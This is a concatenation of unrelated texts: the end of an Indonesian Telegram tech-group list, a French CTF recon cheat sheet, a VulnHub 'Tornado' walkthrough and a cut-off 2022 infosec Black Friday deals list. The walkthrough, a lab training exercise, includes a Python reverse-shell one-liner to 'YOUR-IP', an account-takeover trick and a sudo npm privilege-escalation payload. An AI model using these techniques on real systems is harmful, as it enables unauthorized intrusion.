- [Kubernetes & Cloud Native Indonesia](https://t.me/kubernetesindonesia)
- [OKD Indonesia](https://t.me/okdindonesia)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Firebase
</summary>
- [Firebase Indonesia](https://t.me/firebaseindonesia)
</details>
[back to the 🔝](#list)
<details>
<summary>
### FreeBSD
</summary>
- [Laskar Setan Merah - Sharing All About FreeBSD](https://t.me/setanmerahID)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Game Development
</summary>
- [GAMERANG - Game Developer Semarang](https://t.me/gamerang)
- [Indonesian GDevelop](https://t.me/GDevelopID)
- [Komunitas Godot Indonesia](https://t.me/godot_indonesia)
- [Lombok Games Developers (LGD)](https://t.me/lombokgamedev)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Internet of Things (IoT)
</summary>
- [Arduino Indonesian Community](https://t.me/ArduinoIndonesianCommunity)
- [arduinoindonesia.id](https://t.me/edukasielektronika)
- [KelasRobot.com](https://t.me/kelasrobotgrup)
- [Raspberry PI Indonesia](https://t.me/raspberrypi_id)
</details>
[back to the 🔝](#list)
<details>
<summary>
### iOS
</summary>
- [iKaskus](https://t.me/ikaskus)
- [iNitial E](http://t.me/initialestore)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Jokes
</summary>
- [Linux memes](https://t.me/linux_memes)
- [Programmer Jokes](https://t.me/programmerjokes)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Linux
</summary>
- [Arch Linux Indonesia](https://t.me/ArchLinuxID)
- [Belajar GNU/Linux Indonesia](https://t.me/GNULinuxIndonesia)
- [Belajar Linux](https://t.me/belajarlinuxbareng)
- [BlankOn Linux](https://t.me/BlankOnLinux)
- [CentOS.ID](https://t.me/centosID)
- [Debian Indonesia](https://t.me/Debianid)
- [Deepin Linux Indonesia](https://t.me/deepin_indonesia)
- [Dotfiles Indonesia](https://t.me/dotfiles_id)
- [Elementary OS Indonesia](https://t.me/elementaryID)
- [Fedora Indonesia](https://t.me/FedoraID)
- [GNOME Indonesia](https://t.me/gnomeid)
- [GNU/Weeb](https://t.me/GNUWeeb)
- [Kali Linux Indonesia](https://t.me/KaliLinuxID)
- [KDE Indonesia](https://t.me/kdeid)
- [Komunitas GNU/Linux Malang](https://t.me/linuxmalang)
- [Komunitas Linux Jember](https://t.me/linuxjember)
- [Linux From Scratch ID](https://t.me/lfsid)
- [LangitKetujuh ID](https://t.me/langitketujuh_id)
- [Linux Mint Indonesia](https://t.me/mint_id)
- [Linux Community ID](https://t.me/LinuxGroupID)
- [Manjaro Indonesia](https://t.me/manjaroID)
- [openSUSE Indonesia](https://t.me/openSUSE_ID)
- [Paguyuban Linux Solo](https://t.me/linuxsolo)
- [ParrotSec Indonesia](https://t.me/parrotsecurityindonesia)
- [Red Hat Enterprise Linux ID](https://t.me/rhel_id)
- [Ubuntu Indonesia](https://t.me/ubuntu_indo)
- [Void Linux Indonesia](https://t.me/voidlinux_id)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Lowongan Kerja
</summary>
- [Freelance Project IT](https://t.me/freelance_01)
- [Freelancer - Indonesia](https://t.me/freelancerID)
- [Kotakode Jobs](https://t.me/kotakodejobs)
- [LOKER DEVELOPER/PROGRAMMER](https://t.me/LokerDeveloper)
- [Loker Jakarta](https://t.me/loker_jakarta)
- [Lowongan Kerja IT](https://t.me/LowonganKerjaIT)
- [Rails Indonesia Loker](https://t.me/RailsID_LOKER)
- [Ruby Indonesia Loker](https://t.me/RubyID_LOKER)
</details>
[back to the 🔝](#list)
<details>
<summary>
### macOS
</summary>
- [macOS Indonesia](https://t.me/macOSID)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Microservice
</summary>
- [Microservice Architecture](https://t.me/msarchitecture)
- [Microservice Indonesia](https://t.me/microservices_id)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Mikrotik
</summary>
- [Mikrotik Indonesia](https://t.me/indonesiamikrotik)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Office
</summary>
- [Excel Indonesia](https://t.me/excelid)
- [Libreoffice Indonesia](https://t.me/BelajarLibreOfficeIndonesia)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Open Source
</summary>
- [OSINT Indonesia](https://t.me/OSINT_Indonesia)
- [DOSCOM - Dinus Open Source Community](https://t.me/doscomedia)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Programming Language
</summary>
- **.NET**
- [.NET Indonesia](https://t.me/dotnetusergroup)
- [One .NET Indonesia](https://t.me/dotnetcore_id)
- [Xamarin Indonesia](https://t.me/xamarinindonesia)
- **Android**
- [ADB (Android Developer Bandung)](https://t.me/androidDevBdg)
- [ADN (Android Developer Nasional)](https://t.me/androiddevelopernasional)
- [Android - Teknorial.com](https://t.me/teknorialcom)
- [Android Developer Lombok](https://t.me/android_lombok)
- [AndroidDev Surabaya](https://t.me/androiddevsurabaya)
- [Belajar Bareng Android Jakarta](https://t.me/BelajarBarengAndroid)
- [Jetpack Compose Indonesia](https://t.me/jcomposeindonesia)
- [SANDEC (Semarang Android Developer Center)](https://t.me/AndroidSemarang)
- [Source Code Android](https://t.me/source_code_android)
- [Yogyakarta Android Community](https://t.me/YACgroup)
- **Agile**
- [Agile Circle Indonesia](https://t.me/agilecirclesid)
- [Agile Indonesia](https://t.me/agileindonesia)
- **Assembly**
- [Assembly Programming](https://t.me/AssemblyID)
- **Bash**
- [Bash.ID](https://t.me/bashidorg)
- **Bootstrap**
- [Bootstrap Indonesia](https://t.me/bootstrap_id)
- **C/C++**
- [C/C++ Indonesia](https://t.me/CCpp_Indonesia)
- [Indonesia C/C++ Warriors](https://t.me/idcplc)
- **Crystal**
- [Crystal User Group Indonesia](https://t.me/CrystalID)
- **Dart**
- [dart.web](https://t.me/dart_web)
- [Flutter Indonesia](https://t.me/flutter_id)
- [Flutter Jakarta](https://t.me/flutter_jkt)
- [Flutter Makassar](https://t.me/fluttermakassar)
- [Lombok Flutter](https://t.me/lombokflutter)
- **Elixir**
- [Elixir ID](https://t.me/elixir_id)
- **Golang**
- [Golang Indonesia](https://t.me/gophers_id)
- [Golang Jogja](https://t.me/golangjogja)
- [Golang Surabaya](https://t.me/golangSurabaya)
- **Haskell**
- [Haskell ID](https://t.me/haskell_id)
- **Java**
- [JVM User Group](https://t.me/JVMIndonesia)
- **JavaScript**
- [Adonis.js Indonesia](https://t.me/adonisid)
- [Angular Indonesia](https://t.me/AngularID)
- [Deno Indonesia](https://t.me/deno_id)
- [Electron Desktop User Group](https://t.me/electronatom)
- [GatsbyJS Indonesia](https://t.me/gatsbyjsid)
- [Ionic Indonesia](https://t.me/indonesiaionic)
- [JakartaJS](https://t.me/jakartajs)
- [Javascript Indonesia](https://t.me/js_id)
- [Jogja Js](https://t.me/jogjajs)
- [Lombok Js](https://t.me/lombokjs)
- [NativeScript ID](https://t.me/nativescript_id)
- [Nestjs Indonesia](https://t.me/nestjs_indonesia)
- [Next.js Indonesia](https://t.me/nextjs_id)
- [Nodejs Indonesia](https://t.me/nodejsid)
- [Polymer Indonesia](https://t.me/polymer_id)
- [React Indonesia](https://t.me/react_idn)
- [React Native Indonesia](https://t.me/reactnativeindo)
- [Semarang JS](https://t.me/SemarangJS)
- [SurabayaJs](https://t.me/surabayajs)
- [Svelte Indonesia](https://t.me/svelte_id)
- [Vue.js Indonesia](https://t.me/vuejsindonesia)
- **Kotlin**
- [Kotlin Cirebon](https://t.me/kotlin_crb)
- [Kotlin Indonesia](https://t.me/KotlinIndonesia)
- **Pascal - Delphi**
- [Delphi Indonesia](https://t.me/delphiindonesia)
- [Pascal Indonesia](https://t.me/PascalID)
- **PHP**
- [CodeIgniter Indonesia](https://t.me/codeigniterindonesia)
- [Laravel Indonesia](https://t.me/laravelindonesia)
- [PHP Indonesia for Business](https://t.me/PHPIDforBusiness)
- [PHP Indonesia for Student](https://t.me/PHPIDforStudent)
- [PHP Indonesia Jogloraya](https://t.me/phpjogloraya)
- [Symfony Framework Indonesia](https://t.me/symfonyid)
- [Telegram Bot PHP - Indonesia](https://t.me/botphp)
- [Yii Framework Indonesia](https://t.me/YiiFrameworkIndonesia)
- **Python**
- [Django Indonesia](https://t.me/DjangoID)
- [FastAPI Indonesia](https://t.me/fastapiid)
- [Flask ID](https://t.me/flaskid)
- [Lombok.py](https://t.me/lombok_py)
- [mks.py](https://t.me/mkspy)
- [Python ID Jogja](https://t.me/pyjogja)
- [Python Indonesia](https://t.me/pythonID)
- [Python](https://t.me/Python)
- [Pythonlearnerr](https://t.me/pythonlearnerr)
- [Python / Django Learners](https://t.me/python_learners_group)
- [Surabaya.py](https://t.me/surabayapy)
- **Ruby**
- [Rails Indonesia](https://t.me/RailsID)
- [Ruby Indonesia](https://t.me/ruby_id)
- **Swift**
- [Swift Indonesia](https://t.me/swiftID)
- **Typescript**
- [Typescript Indonesia](https://t.me/TypescriptIndonesia)
- **SAP ABAP Indonesia**
- [SAP-ABAP Indonesia](https://t.me/sapabapindonesia)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Quantum
</summary>
- [Indonesian Quantum Computing Enthusiasts](https://t.me/idqce)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Science
</summary>
- **Geographic Information System and Remote Sensing**
- [GIS Indonesia](https://t.me/gis_id)
- [Leaflet.js Indonesia](https://t.me/leafletid)
- [QGIS Indonesia](https://t.me/qgisindonesia)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Security
</summary>
- [DevSecOps Indonesia](https://t.me/DevSecOpsIndonesia)
- [ForensicaID](https://t.me/ForensicaID)
- [IT SECURITY INDONESIA](https://t.me/itsecurityindonesia)
- [Linuxhackingid](https://t.me/linuxhackingid)
- [Orang Siber Indonesia](https://t.me/orangsiber)
- [OSINT Indonesia](https://t.me/OSINT_ID)
- [Reversing.ID](https://t.me/reversingid)
- [Security.ID](https://t.me/CyberSecurity_ID)
- [HackTheBox Indonesia](https://t.me/hacktheboxindo)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Software Quality Assurance (SQA)
</summary>
- [Indonesian Software Quality Assurance](https://t.me/sqa_id)
- [ISQA Chapter Jogja](https://t.me/joinchat/HxMrghPz5z3hr0eiRBcXOQ)
- [Malang Quality Assurance](https://t.me/qamalang)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Startup
</summary>
- [Cafe Startup 140315](https://t.me/cafestartup)
- [STARTUP INDONESIA on TELEGRAM](https://t.me/startupindonesia)
- [Startup Life Indonesia](https://t.me/StartupLifeIndonesia)
- [Startup Weekend Indonesia](https://t.me/startupweekendindonesia)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Tentang Telegram
</summary>
- [Telegram beta](https://t.me/tgbeta)
- [Telegram Themes](https://t.me/themeschannel)
- [Tentang Telegram](https://t.me/tentangtelegram)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Tips
</summary>
- [The Art of Programming](https://t.me/theprogrammingart)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Windows
</summary>
- [PegelWindows](https://t.me/pegelwindows)
- [Windows Community ID](https://t.me/WinTenGroup)
- [WINDOWS SERVER INDONESIA](https://t.me/WindServID)
</details>
[back to the 🔝](#list)
## Contributing
Please see [CONTRIBUTING](CONTRIBUTING.md) for details.
## Listed by _Hendi Santika_
- Email: hendisantika@gmail.com
- Telegram: [@hendisantika34](https://t.me/hendisantika34)
## License
[![CC0](https://i.creativecommons.org/p/zero/1.0/88x31.png)](https://creativecommons.org/publicdomain/zero/1.0/)
To the extent possible under law, [Hendi Santika](https://github.com/hendisantika) has waived all copyright and related or neighbouring rights to this work.
|
# My Toolbox for CTF
## /etc/hosts
Certain services web utilisent un fqdn pour faire le routage. On remplace l'adresse IP par target.local
cat /etc/hosts
10.10.10.8 <tab> target.local
## Network enum
Un petit scan rapide pour identifier les ports ouverts, et anticiper le lancement de scan web
nmap IPTARGET
Nous recupèrons les versions par l'examen des bannières pour chercher des exploits
nmap -A IPTARGET
Un scan sur les 65535 ports TCP va prendre du temps, on le lance dans une autre fenetre
nmap -sC -sV -p- IPTARGET
On lance un scan sur les ports UDP usuels, et on tente notre chance en snmp
nmap -sU IPTARGET
snmpwalk -c public IPTARGET
Les services sont le plus souvent HTTP, HTTPS (80,8080, 443), parfois un proxu HTTP. Souvent, on récupère ftp (21), ou NetBios/SMB.
Le port bind(53) implique souvent des noms de machine : web.server.local, proxy.server.local à la place d'adresses IP.
## HTTP
### Burp
Nous utilisons deux navigateurs: Firefox avec Burp pour naviguer sur notre cible, et Google-chrome pour aller sur Internet.
Ainsi le proxy Burp n'est pas pollué par nos navigations.
### Source code
Regarder le code HTML dans le navigateur
Regarder les header HTTPs dans Burp
### Robot.txt
/robots.txt
### Screenshot
Prendre une capture d'écran. Les fichiers en .png sont enregistrés dans ~/Images
Shift+ImpEcran
Capturer une page web
wkhtmltoimage http://target/path screnn.png
### Dictionnaires web
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- /usr/share/wordlists/dirb/vulns
- is.txt
- tomcat.txt
### Dirb
On utilise dirb pour un scan rapide avec un petit dictionnaire
dirb http://SERVER
### Gobuster
On lance un scan plus riche avec gobuster basé sur un dictionnaire plus volumineux
/opt/gobuster/gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://172.16.27.142 -l -x html,php,js,txt
HTTPS: -k : skipp ssl verification
### Nikto
Nikto donne des informations sur les middlewares
nikto -h IPSERVER -p PORTSERVER
|
# Torando
[Room Link](https://www.vulnhub.com/entry/ia-tornado,639/)
![image](https://user-images.githubusercontent.com/5285547/121968926-21f79300-cd6b-11eb-88a2-531041557970.png)
## Enumeration
Let's start with some enum!
### Nmap
```bash
nmap -p- -v 192.168.56.122
```
```bash
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
```
### Gobuster
```bash
gobuster dir -u http://192.168.56.122/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x txt,html,gz,php,js,zip,img,bak -t 45
```
```bash
/index.html (Status: 200) [Size: 10701]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.122/manual/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.122/javascript/]
/server-status (Status: 403) [Size: 279]
/bluesky (Status: 301) [Size: 318] [--> http://192.168.56.122/bluesky/]
```
bluesky? lets check it out
```bash
gobuster dir -u http://192.168.56.122/bluesky -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x txt,html,gz,php,js,zip,img,bak -t 45
```
```bash
/index.html (Status: 200) [Size: 14979]
/login.php (Status: 200) [Size: 824]
/contact.php (Status: 302) [Size: 2034] [--> login.php]
/about.php (Status: 302) [Size: 2024] [--> login.php]
/signup.php (Status: 200) [Size: 825]
/css (Status: 301) [Size: 322] [--> http://192.168.56.122/bluesky/css/]
gobuster dir -u http://192.168.56.122/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x /imgs (Status: 301) [Size: 323] [--> http://192.168.56.122/bluesky/imgs/]
/js (Status: 301) [Size: 321] [--> http://192.168.56.122/bluesky/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/dashboard.php (Status: 302) [Size: 2024] [--> login.php]
/port.php (Status: 302) [Size: 2098] [--> login.php]
```
Nice, we have a signup.php and login.php. Looks like a good place to start.
Lets create an account and check the web app out.
http://192.168.56.122/bluesky/
![image](https://user-images.githubusercontent.com/5285547/121968941-2d4abe80-cd6b-11eb-9c53-2be3f22bbcc6.png)
http://192.168.56.122/bluesky/signup.php
![image](https://user-images.githubusercontent.com/5285547/121969063-700c9680-cd6b-11eb-95eb-4f10ec2fa170.png)
After registering and going to login.php we get a dashbaord interface.
![image](https://user-images.githubusercontent.com/5285547/121969202-afd37e00-cd6b-11eb-9f1c-4a4443556bc1.png)
![image](https://user-images.githubusercontent.com/5285547/121969243-c11c8a80-cd6b-11eb-8e4b-d235c460b5ff.png)
![image](https://user-images.githubusercontent.com/5285547/121969267-d2659700-cd6b-11eb-996a-eea16e5413c9.png)
![image](https://user-images.githubusercontent.com/5285547/121969288-dee9ef80-cd6b-11eb-9461-ddcb1d8576e0.png)
Ok, so the contact form is not working and not much else is present apart from the hint for LFI. After testing I could not find any LFI vulnerability.
Checking the source code of the web pages, we see one comment out of place on the portfolio.php page.
```html
<!-- /home/tornado/imp.txt -->
```
Now the LFI makes sense, after trying a few variations we can get the working payload as
```bash
http://192.168.56.122/~tornado/imp.txt
```
![image](https://user-images.githubusercontent.com/5285547/121969565-7bac8d00-cd6c-11eb-882b-bd3585f0d9ba.png)
Now we have a list of what looks like varified users. Lets test the accounts and see if any have higher prividledges.
Using Burp community I captured the signup.php request and sent it to intruder so i can see if i can make the account on the list.
It seemded none had extra access we see jacob@tornado, admin@tornado, hr@tornado are already registered.
In the requests response I noticed a 'name:-13' element. On successful signup it was 'name:-15'
![image](https://user-images.githubusercontent.com/5285547/121970450-7d775000-cd6e-11eb-91c5-4eff2081d8b9.png)
I then tried to edit the source code with dev tools (F12) field to allow more charaters in the email field.
Changing the charate limit to 20 then trying again with 'jacob@tornado a' we can make a new acocunt. After now loggin in with jacob,
the contact form works.
![image](https://user-images.githubusercontent.com/5285547/121970990-a815d880-cd6f-11eb-9065-c3f320f98b6e.png)
![image](https://user-images.githubusercontent.com/5285547/121971000-b06e1380-cd6f-11eb-9535-e0f15dc61742.png)
Using tcpdump we can see if we get any ping back to our machine, which we do.
```bash
sudo tcpdump -i eth1
```
![image](https://user-images.githubusercontent.com/5285547/121971233-2e321f00-cd70-11eb-983c-5540275aede0.png)
## User
Looks like we can get a reverse connection.
Payload
```python
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR-IP",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
```
kill current terminal
```
Ctrl + z
```
echo raw stty then forground it
```
stty raw -echo;fg
```
select terminal
```
xterm
```
when you get the terminal back enter
```
export TERM=xterm
```
![image](https://user-images.githubusercontent.com/5285547/121971512-c3351800-cd70-11eb-8e80-f06ad6df8344.png)
Enumerating the system we quickly see our priv esc route on the machine.
![image](https://user-images.githubusercontent.com/5285547/121972155-4acf5680-cd72-11eb-86d2-0ce04c48c006.png)
First i created an index.js file
cd /tmp
mkdir shell
echo 'module.exports = install could be dangerous' > index.js
cp index.js shell
Now we need a package.json file and chmod to make it executable, then we can run the sudo command to user.
package.json
```json
{
"name": "shell",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"shell": "/bin/bash"
},
"author": "",
"license": "ISC"
}
```
```bash
sudo -u catchme npm run-script shell
```
![image](https://user-images.githubusercontent.com/5285547/121973542-6c7e0d00-cd75-11eb-9fd0-e5a514ec3277.png)
![image](https://user-images.githubusercontent.com/5285547/121973630-a3ecb980-cd75-11eb-9039-3ad591d17b11.png)
We see a 'enc.py'
```bash
cat enc.py
```
```bash
s = "abcdefghijklmnopqrstuvwxyz"
shift=0
encrypted="hcjqnnsotrrwnqc"
#
k = input("Input a single word key :")
if len(k) > 1:
print("Something bad happened!")
exit(-1)
i = ord(k)
s = s.replace(k, '')
s = k + s
t = input("Enter the string to Encrypt here:")
li = len(t)
print("Encrypted message is:", end="")
while li != 0:
for n in t:
j = ord(n)
if j == ord('a'):
j = i
print(chr(j), end="")
li = li - 1
elif n > 'a' and n <= k:
j = j - 1
print(chr(j), end="")
li = li - 1
#----snip
Seeing this was a ceasar cipher i wrote a quick python script to guess the key for me.
```python3
import string
alphabet = string.ascii_lowercase # "abcdefghijklmnopqrstuvwxyz"
encrypted = "hcjqnnsotrrwnqc" # message
enc_len = len(encrypted) # msg length
for i in range(40):
plain_text = ""
for c in encrypted:
if c.islower():
# find the position in 0-25
c_unicode = ord(c)
c_index = ord(c) - ord("a")
# perform the negative shift
new_index = (c_index - i) % 26
# convert to new character
new_unicode = new_index + ord("a")
new_character = chr(new_unicode)
# append to plain string
plain_text = plain_text + new_character
else:
# since character is not uppercase, leave it as it is
plain_text += c
print(f"ID:{i} - {plain_text}")
```
![image](https://user-images.githubusercontent.com/5285547/121975840-7b1af300-cd7a-11eb-8d84-897fb52460cb.png)
The password wasn't 100% and will require some guess work, but that's root and the last flag!
![image](https://user-images.githubusercontent.com/5285547/121976051-ef559680-cd7a-11eb-9eeb-4a11cbfb7d92.png)
Hope you liked the guide. Happy hacking :)
|
# InfoSec Black Friday Deals ~ "Hack Friday" 2022 Edition
All the deals for InfoSec related software/tools this Black Friday / Cyber Monday, for all the hackers that saved $8 on blue and got a free :see_no_evil: instead.
This list is for you if you are in: all teh cyberz, penetration tester, blue team, red team, purple team, secure code, exploit research and development, vulnerability management, threat hunting, incident response, forensics, intelligence, threat intelligence, open-source intelligence, governance/risk/compliance, security architect, network security, CSO/CISO, AppSec, DevSecOps, consulting, security awareness, and -insert your role here-
The below deals have either publicly announced they'll be doing a deal or highly expected.
- All USD
- All End times in UTC
- DYOR and AYOR: I have not vetted links for legitimacy
- Some vendors use my handle for tracking this list - there are **NO** referral/affiliate/commission links here
## FAQ
### When will most of the deals/discounts be here?
Most likely 24th midday, but some start on Monday, so check back often!
### When do these sales end?
Most end 30th November
### Can I add deals to the page?
Yes, please follow formatting guidelines, provide a source and code. Has to be infosec related, no affiliate links, deal has to be active or a waitlist.
:see_no_evil: means 1) Limited to first x users 2) Great deal or 3) Highly recommended by moi
*Disclaimer: I have included my own, and other discount codes sent in directly by DM/Pigeon/Smoke signals.
PS - if this list helped you and you'd like to say thanks, consider a $2 donation to these awesome groups that help locate missing persons with OSINT: \
https://mpan.com.au/ - (Australia <3) \
https://www.tracelabs.org/get-involved - (World)
-----------------------------------------------------------------------------------------
# InfoSec Black Friday Deals 2022
## Newsletters
Unsupervised Learning Subscription (Annual) \
https://danielmiessler.com/subscribe/
25% off ($74.00 instead of $99) with code: blackfriday \
Deal ends: Nov 27th, 2022 at 11:59pm
Cybersecurity Weekly Newsletter \
https://letsdefend.io/cybersecurity-news.html
99% off ($1 instead of $100) with code: BLCKFRDY-NEWS \
Deal ends: December
## Professional Services (NEW CATEGORY):
UnderDefense Cybersecurity \
https://underdefense.com/cyber-monday-offer/
20% off Application/Network/Infrastructure Pentest \
40% off four App Pentests (multi-year bundle) \
20-40% Off 24×7 Managed Threat Detection and Response \
20-40% off for Incident Response Retainer \
Deal ends: Nov 30th
Central InfoSec \
https://www.centralinfosec.com/cyber-monday
25% Off - External Network Penetration Test \
25% Off - Internal Network Penetration Test \
25% Off - Web Application Penetration Test \
35% Off - Red Team Assessment (Assumed Breach) \
50% Off - Red Team Assessment (Full Scope) \
Deal Ends November 30th 2022
## Tools
Workflow86 - document, automate and manage security processes and ops \
https://www.workflow86.com/
30% off for 3 months with code: BLACKFRIDAY \
Deal valid: 3 December 2022
ScanTitan - Website and External Attack Surface Security Scanning and Monitoring \
https://www.scantitan.com/
Lifetime for Professional Plan for $95.52 USD (92% Off) with code: BF-THGV-LZKJ \
Deal valid: 1 December 2022
Security For Everyone - Continuous Security Scanner & Unlimited Manual Scan \
https://securityforeveryone.com/products/continuous-security
50% off with code: BLACKFRIDAY \
Deal valid: 30th November
ImmuniWeb AI Platform \
https://www.immuniweb.com
Black Friday: 40% off any one-time purchase and monthly subscriptions with code: BF22-XARA \
Thanksgiving Day: 40% off ImmuniWeb Discovery with code: 8AXN-1XYS-FMUJ \
Deals valid only on their respective days
Nessus (Professional or Expert) \
https://store.tenable.com/1479/purl-webNessusOneYearOptin?x-source=BF22
50% off with code: TakeHalf \
Deal valid: 24-28th November
Securestack DevSecOps platform :see_no_evil:\
https://securestack.com/black-friday-sale/
50% off any subscription for 3 months with code: BLACKFRIDAY22SUB \
--OR-- \
FREE mini assessment of source code, AWS and web assets with code: BLACKFRIDAY22MINI \
Deal ends: 2nd December
IDA - Reverse Engineering Tool :see_no_evil:\
https://hex-rays.com/terms-and-conditions-black-friday-sale-2022/
25% off IDA Home and 10% off IDA Pro applied automatically to cart \
Deal valid: 25th-28th November (CET)
Proxyman \
Web Debugging Proxy macOS app for sec/devs to capture, inspect, and manipulate HTTP(s) requests/responses \
https://proxyman.io
30% off with code: PROXYMAN_BLACK_FRIDAY_2022
ExploitPack \
https://exploitpack.com/
Lifetime premium license instead of one-year subscription
Burp Bounty Pro Extension \
https://burpbounty.net/
$60 per year instead of $80
Grayhat Warfare :see_no_evil:\
https://grayhatwarfare.com/packages/
$160 instead of $300 for yearly pro \
$460 instead of $985 for yearly enterprise
PulseDive Threat Intelligence \
https://blog.pulsedive.com/black-friday-2022/
50% off Pro for first year or 25% off API and Feed bundles \
https://forms.gle/XApB63ZUWH5kcpns9
Humble Cyber Bundle - 25% off 2 or more Pulsedive Products (Pro, API, Feed)
Kon-Boot - Bypass Windows / macOS Passwords \
https://kon-boot.com/?NOVEMBER=1
25% off select licenses \
Deal ends: 28th November
1BitSquared - Embedded Hardware and FPGA Tools \
https://1bitsquared.com/discount/BLACKFRIDAY2022
$7 off towards shipping for orders above $25 \
Deal ends: 28th November
010 Editor - Professional text and hex editing with Binary Templates \
https://www.sweetscape.com/store/
25% off \
Deal ends: 28th November
Little Snitch - Host based macOS firewall \
https://www.obdev.at/products/littlesnitch/order.html
50% off \
Deal ends: Unknown or N/A
## Courses & Training
SEKTOR7 Institute :see_no_evil: \
https://institute.sektor7.net
25% off regular price with code: BEFICOM-22 \
Deal ends: Cyber Monday
Securízame hacking, DFIR and hardening training (SPANISH) \
https://www.securizame.com/BlackFriday2022/
25% discount for online and online++ training \
Deal ends: 2nd December
Applied Network Defense / Chris Sanders \
https://networkdefense.io
20-25% all courses. Discounted price are reflect on course website \
Deal ends: 29 November at midnight ET
The OSINTion - Affordable Open Source Intelligence (OSINT) Training\
https://www.theosintion.com
40% off courses and 1:1 Investigation Experiences at https://www.theosintion.com/courses/store with code: BLACKFRIDAY2022\
Additonal 20% off bundles at https://app.acuityscheduling.com/catalog.php?owner=17960574&category=Bundles with code: BLACKFRIDAYBUNDLE2022 \
Deal ends: 1st December
AppSecEngineer - Hands-on Training and Challenges in AppSec, DevSecOps and Cloud-Native Security \
https://www.appsecengineer.com/main-menu-pages/pricing
25% off Annual Plans with code: THANKSGIVING22 \
Deal ends: 30th November
OSINT Combine - Open-Source Intelligence & Dark Web Investigation Training :see_no_evil:\
https://academy.osintcombine.com/
20% off with code: BLACKFRIDAY22 \
Deal ends: 28th November
Offensive Security - Penetration Testing Training \
https://www.offensive-security.com/learn-one/ \
20% off Learn One \
Deal ends: 31st December
Hexordia & Cyber 5W - Digital Forensics Training \
https://www.hexordia.com/black-friday-sale
https://cyber5w.com/
50% off courses code: c5whexordiabfcm22 \
Deal valid: November 25-28 2022
Practical DevSecOps - Hands on DevSecOps and Product Security Courses \
https://www.practical-devsecops.com/black-friday/
15% off all courses \
Deal ends: 30th November
Blue Team Training - LetsDefend :see_no_evil:\
https://letsdefend.io/
50% off code: BLCKFRDY \
Deal ends: 2nd December
CareerSec: Securing Your Advancement in the Cyber Workforce \
https://mikeprivette.gumroad.com/l/avoiding-lateral-movement/infosec-blackfriday-20
20% at checkout with code: INFOSEC-BLACKFRIDAY-20 \
Deal ends: 30th November
DroneSec (Drone Cybersec, Threat Intel & Counter-Drone Security Training) :see_no_evil:\
https://training.dronesec.com/
40% off with code: GIVETHANKS22 \
Deal ends: 2nd December
The Cyber Plumber's Lab Guide and Access \
https://opsdisk.gumroad.com/l/cphlab/blackfriday2022
(1) 50% off + free handbook (2) 75% off for students \
Deal ends: December
Platzi (IT Educational Platform (with security courses)) \
https://platzi.com/blackfriday
30% off one year subscription \
Deal ends: 25th November
Security Blue Team (SBT) \
https://securityblue.team/black-friday/
25% off for BTL2 cert + FREE 6 Months BTLO Pro \
BTL1 + FREE 6 Months BTLO Pro \
Discounts for BTL Pro \
Deal valid: 22-9 December
Zero Point Security Certifications & Courses \
https://training.zeropointsecurity.co.uk
20% off with code: BLACKFRI22 \
Deal ends: 28th November
7asecurity (Security 100% Hands-On Training) \
https://store.7asecurity.com
50% off any course with code: BFCM50 \
Deal ends: December 2nd
TheXSSRat (Bug Bounty and Hacking) \
(https://thexssrat.podia.com/)
85% off any course with code: lemon \
Full House is $500 with 85% comes to $75 for all \
Deal ends: Nov 25
Cybrary (CyberSecurity Trainings) \
https://www.cybrary.it/
20% off annual membership with code: BlackFriday20 \
Change plan to ANNUAL, then replace the ANNUAL10 coupon with the above coupon \
Deal ends: Nov 25 (Friday) midnight
Offensive C# \
https://www.udemy.com/course/offensive-csharp/?couponCode=BLACKFRIDAY22
50% off at checkout with code: BLACKFRIDAY22 \
Deal ends: 22th November
TCM Security Certification & Courses :see_no_evil:\
https://tcm-sec.com/coupon/
(1) 50% off all courses \
(2) 20% off PNPT \
(3) 50% off First Month’s All-Access Pass* \
(4) 25% off the Annual All-Access Pass* \
use code: GIVETHANKS \
\* Refer to the link for more details \
Deal ends: 29th November, 4:59 am UTC
Enciphers Training (Mobile Security 100% Hands-On Training) \
https://training.enciphers.com/
40% off at checkout with code: W1NT3R-1S-COM1NG \
Deal ends: December
Bug Bounty Hunter - Bug Bounty Training by zseano \
https://www.bugbountyhunter.com/membership/
37.33% off \
Deal ends: 28th November 23:59:59 UTC
Cybr - Cybersecurity training and community \
https://cybr.com/pricing/
29% lifetime discount on yearly plans \
Deal ends: 27th November 23:59:59 UTC
CloudBreach - Offensive Azure Security Professional \
https://cloudbreach.io/BlackFriday/
20% Discount on All CloudBreach Security Training Products \
Promo code: BlackFriday22 \
Deal ends: 30th November 23:59:59 UTC
ISACA - CISA & CISM Certification \
https://www.isaca.org/campaigns/cisa-cism-exam-discount
